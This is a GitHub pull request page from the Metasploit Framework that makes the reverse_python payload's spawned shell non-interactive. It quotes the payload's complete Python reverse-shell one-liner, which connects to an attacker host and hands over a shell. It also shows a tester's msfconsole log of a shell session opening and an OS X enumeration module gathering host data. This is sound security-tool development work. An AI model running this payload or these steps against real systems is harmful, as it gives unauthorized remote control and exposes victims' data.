Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Remove -i from shell in reverse_python #4864

Merged
merged 2 commits into from
Mar 2, 2015
Merged

Remove -i from shell in reverse_python #4864

merged 2 commits into from
Mar 2, 2015

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Mar 2, 2015 

wvu@kharak:~/metasploit-framework:master$ git grep -w -- -i modules/payloads | cat
modules/payloads/singles/cmd/unix/reverse_python.rb:    raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"#{datastore['SHELL']}\",\"-i\"]);"
wvu@kharak:~/metasploit-framework:master$

Consistency with the rest of our payloads. Also, if a shell doesn't support the intended -i, we're fscked. Rediscovered in #4857.

  • Spin up exploit/multi/handler
  • Pop a reverse_python shell
  • See that everything works

@wvu
Copy link
Contributor Author

wvu commented Mar 2, 2015

Not gonna golf this one.

@bcook-r7
Copy link
Contributor

bcook-r7 commented Mar 2, 2015

Works as advertised

msf > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(handler) > set LHOST blah
LHOST => blah
msf exploit(handler) > run

[*] Started reverse handler on blah:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (blah:4444 -> blah:52140) at 2015-03-02 16:08:55 -0600

pwd
/Users/user/projects/metasploit-framework

Background session 1? [y/N]  y

msf exploit(handler) > use post/osx/gather/enum_osx
msf post(enum_osx) > set session -1
session => -1
msf post(enum_osx) > run

[*] Running module against mycomputer
[*] Saving all data to /Users/user/.msf4/logs/post/enum_osx/mycomputer_20150302.1141
[*]     Enumerating OS
[*]     Enumerating Network
[*]     Enumerating Bluetooth
...

@bcook-r7 bcook-r7 merged commit a648e74 into rapid7:master Mar 2, 2015
bcook-r7 pushed a commit that referenced this pull request Mar 2, 2015
Land #4864 @wvu-r7 changes reverse_python to be non-interactive
4b54517 
This avoids sourcing the shell RC scripts, writing history, etc.
@bcook-r7
Copy link
Contributor

bcook-r7 commented Mar 2, 2015

Thanks @wvu-r7 for noticing this detail.

@wvu
Copy link
Contributor Author

wvu commented Mar 2, 2015

I honestly forgot about it for too long. :(

@wvu wvu deleted the beug/reverse_python branch March 2, 2015 22:36
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bcook-r7 bcook-r7

Labels
bug payload
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@wvu @bcook-r7